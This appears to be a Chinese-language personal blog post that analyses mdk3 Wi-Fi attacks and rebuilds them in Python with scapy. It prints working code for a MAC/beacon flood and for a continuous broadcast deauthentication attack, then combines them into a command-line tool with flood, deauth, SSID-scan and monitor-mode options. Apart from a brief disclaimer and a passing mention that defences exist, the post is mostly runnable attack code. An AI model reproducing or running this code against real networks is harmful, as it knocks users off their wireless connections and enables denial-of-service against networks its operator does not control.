py_wifi_dos
前言
距离放寒假还有10天左右,这个星期继续在实验室折腾。突然对mdk3感兴趣,然后逐步了解写出一个脚本。
提醒:本文仅安全研究学习,若是违法被抓作者不负责
分析mdk3的攻击
先开启网卡监听模式
airmon-ng start <iface>
首先是Mac洪水攻击:
mdk3 <iface> a -a <bssid>
没攻击之前:
攻击中
wireshark抓到的包:
分析
Receiver address: 接收地址(Client)
Destination address:目的地地址(Client)
Transmitter address:发射地址(AP)
BSSID:BSSID
猜想:
MAC水攻击也就是生成批量的MAC的地址,然后构造请求AP验证的数据包
(也就是说只有请求包,不需要构造响应包)
所以一和二为一样的,接着去scapy找对应的函数。
合三为一查看帮助:
RadioTap()经过对比,发现可以保持默认即可
Dot11() 里的addr1填目标MAC地址,这里全部客户端攻击填写:FF:FF:FF:FF:FF:FF或者填指定的MAC
addr2和addr3填AP地址
Dot11Beacon() 保持默认或自行更改
MAC洪水攻击代码:
#coding:utf-8
'''
@author:九世
@time:2019/1/3
'''
from scapy.all import *
import threading
n=[]
m=[]
yser=input("RMAC:")
def dos(mac):
for k in range(65, 71):
n.append(chr(k))
for q in range(0, 9):
m.append(q)
#批量生成MAC
for v in n:
for l in m:
for k in n:
for w in m:
for s in n:
for mq in m:
for q in n:
for p in m:
for o in n:
for g in m:
for we in n:
for wq in m:
macs = "{}{}:{}{}:{}{}:{}{}:{}{}:{}{}".format(v, l, k, w, s, mq, q,p, o, g, we, wq)
data=RadioTap()/Dot11(subtype=11,addr1="ff:ff:ff:ff:ff:ff",addr2="{}".format(macs),addr3=mac,addr4=mac)/Dot11Beacon(timestamp=70180) #构造数据包
sendp(data,iface="mon0")
if __name__ == '__main__':
t=threading.Thread(target=dos,args=("{}".format(yser),))
t.start()
攻击效果:
Deauch attack攻击
Deauch攻击就是伪造AP断开连接的数据包发送给AP还有客户端。造成无法连接到网络
通过刚刚说的话可以获得一个关键信息,我们要构造两个数据包。一个发送给AP一个发送给客户实现欺骗。
wireshark抓包分析
欺骗AP
那么用到的scapy函数如下:
RadioTap()/Dot11()/Dot11Deauth()
demo代码:
from scapy.all import *
#构造一个发送给客户端的包和一个给AP的包
while True:
deauth_pkt1 = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2="<you MAC>", addr3="<you MAC>") / Dot11Deauth()
deauth_pkt2 = RadioTap()/Dot11(addr1="<you MAC>", addr2="ff:ff:ff:ff:ff:ff", addr3="ff:ff:ff:ff:ff:ff") / Dot11Deauth()
sendp(deauth_pkt1,iface="mon0")
sendp(deauth_pkt2,iface="mon0")
测试结果:
手机也有一个测试但是没有视频很难看出效果,给我师父可以拿代码自行测试
代码集合体
由于当事人的能力不足,导致自己处于不利的地位 --《小黑发金木*金木*340号 金木*小白发金木*佐佐木 绯世*黑色死神 金木*独眼之王 金木*天使形态 金木》
代码:
'''
@author:jiushi
@time:2019/1/4
'''
#-*-coding:utf-8-*-
from scapy.all import *
import optparse
import os
banner="""
signature:今生今世非你不娶
"""
print(banner)
print('[!] Reminder: This tool needs to install the airmon-ng tool.')
print('')
print('')
print('1.Generate a large number of mac addresses for flood attacks')
print('2.Dot11Deauch attack')
print('3.SSID and MAC scan')
print('4.NIC open monitor mode')
print('')
print('')
mac_list=[]
ssid_list=[]
def main():
parser=optparse.OptionParser()
parser.add_option('-r',dest='rmac',help='rhost_mac')
parser.add_option('-m',dest='macaddresses',help='mac addresses',action='store_true')
parser.add_option('-d',dest='deauch',help='Deauch attack',action='store_true')
parser.add_option('-s',dest='scan',help='ssid and macscan',action='store_true')
parser.add_option('-f',dest='iface',help='network iface',action='store')
parser.add_option('-t',dest='start',help='nic open monitor mode',action='store_true')
(options,args)=parser.parse_args()
if options.macaddresses and options.iface and options.rmac:
ifaces=options.iface
rsmac=options.rmac
mac_addresses(ifaces,rsmac)
elif options.deauch and options.iface and options.rmac:
iface2=options.iface
rs2mac=options.rmac
attack(iface2,rs2mac)
elif options.scan and options.iface:
iface3=options.iface
xj=open('save.txt','w')
xj.close()
print('[+] SSID scan:')
print('[!] Ctrl+C stop')
print('')
print('')
sniff(iface=iface3,prn=scan)
elif options.start and options.iface:
iface0=options.iface
start(iface0)
else:
parser.print_help()
exit()
def mac_addresses(iface1,rsmac):
print('[+] mac_addresses')
print('')
n=[]
m=[]
for k in range(65, 71):
n.append(chr(k))
for q in range(0, 9):
m.append(q)
for v in n:
for l in m:
for k in n:
for w in m:
for s in n:
for mq in m:
for q in n:
for p in m:
for o in n:
for g in m:
for we in n:
for wq in m:
macss = "{}{}:{}{}:{}{}:{}{}:{}{}:{}{}".format(v, l, k, w, s, mq, q,p, o, g, we, wq)
data=RadioTap()/Dot11(subtype=11,addr1="ff:ff:ff:ff:ff:ff",addr2="{}".format(macss),addr3=rsmac,addr4=rsmac)/Dot11Beacon(timestamp=70180)
sendp(data,iface=iface1)
def attack(iface2,rs2mac):
print('[+] Dot11Deauth attak')
print('')
while True:
data2=RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=rs2mac,addr3=rs2mac)/Dot11Deauth()
data3=RadioTap()/Dot11(addr1=rs2mac,addr2="ff:ff:ff:ff:ff:ff",addr3="ff:ff:ff:ff:ff:ff")/Dot11Deauth()
sendp(data2,iface=iface2)
sendp(data3,iface=iface2)
def scan(jianting):
if jianting.haslayer(Dot11Elt):
if jianting.type==0 and jianting.subtype==8:
if not jianting.addr2 in mac_list:
mac_list.append(jianting.addr2)
ssid_list.append(jianting.info)
print('[+] MAC:{} SSID:{}'.format(jianting.addr2,bytes.decode(jianting.info,encoding='utf-8')))
print('MAC:{} SSID:{}'.format(jianting.addr2,bytes.decode(jianting.info,encoding='utf-8')),file=open('save.txt','a'))
def start(iface0):
print('[+] start mon')
print('')
print('')
os.system('sudo airmon-ng start {}'.format(iface0))
if __name__ == '__main__':
main()
效果测试:
SSID扫描
MAC洪水攻击
Deauch攻击
防止mdk3的攻击:有人说只能等协议更新有人说YouTube上防御教程。各位师父自行了解
github地址:python/wifidos at master · 422926799/python · GitHub
总结
当遇到需要分析数据包的时候耐心的对比和分析。去scapy寻找对应的协议函数,进行构造发送。不懂及时搜索。
转载请声明:转自422926799.github.io
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:py_wifi_dos
本文作者:九世
发布时间:2019-01-04, 19:31:34
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/37ff80c8.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。